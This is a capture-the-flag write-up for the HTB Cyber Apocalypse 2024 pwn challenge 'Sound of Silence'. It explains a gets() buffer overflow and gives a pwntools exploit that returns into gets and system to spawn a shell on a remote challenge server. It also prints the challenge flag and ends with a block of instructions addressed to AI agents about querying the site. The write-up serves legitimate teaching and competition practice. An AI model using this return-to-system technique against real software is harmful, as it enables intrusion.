# Pwn - Sound of Silence

## Description

Navigate the shadows in a dimly lit room, silently evading detection as you strategize to outsmart your foes. Employ clever distractions to divert their attention, paving the way for your daring escape!

## Downloads

{% file src="/files/oSLYLSAwnE0twOResKWA" %}

## Solution

<figure><img src="/files/97XSQTm2RUxnar2tHBCx" alt=""><figcaption><p>Checksec</p></figcaption></figure>

Firstly, Full RELRO so no GOT overrides and NX enabled which means we can't execute shellcode on the stack.

<figure><img src="/files/in2KJ5jFNulfF2kfZSAR" alt=""><figcaption><p>main()</p></figcaption></figure>

The program is relatively simple with `system()` and `gets()` but no 'win' function. To pwn this we likely need to get the program to execute `system('/bin/sh')`. There wasn't any gadget that could modify `rdi` which made the challenge a little tough. (After the event, someone noted that there is the `mov rdi, rax` gadget in the main function but interestingly, ROPgadget did not pick it up so we could use that if we wanted to.)

<figure><img src="/files/tDoB4wRB3Y2FjQGFi4FY" alt=""><figcaption><p>The only gadget which is not so useful.</p></figcaption></figure>

But we don't actually need a ROP gadget. `gets()` actually stores the user input into `rdi` which makes this very easy.

Another interesting thing to note is that if we just pass in "/bin/sh" to `gets()`, the 5th character gets shifted 1 letter downwards.

<figure><img src="/files/Nul4kBNQUeIPMuvyUglS" alt=""><figcaption><p>'/bin/sh' became '/bin.sh'</p></figcaption></figure>

To overcome this we just need to send "/bin0sh" instead.

```python
from pwn import *

exe = './sound_of_silence'
elf = context.binary = ELF(exe, checksec=False)
# context.log_level = 'debug'

offset = 40

# io = process(exe)
io = remote("94.237.63.93", 59792)

payload = b'A' * offset
payload += p64(elf.plt.gets)
payload += p64(elf.plt.system)

io.sendlineafter(b'>> ', payload)
io.sendline(b'/bin0sh')

io.interactive()
```

<figure><img src="/files/vtqpIW4p7aC0Jvh7PScO" alt=""><figcaption><p>Pwned</p></figcaption></figure>

Flag: `HTB{n0_n33d_4_l34k5_wh3n_u_h4v3_5y5t3m}`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://arne-ctf.gitbook.io/ctf/2024/htb-cyber-apocalypse/pwn-sound-of-silence.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.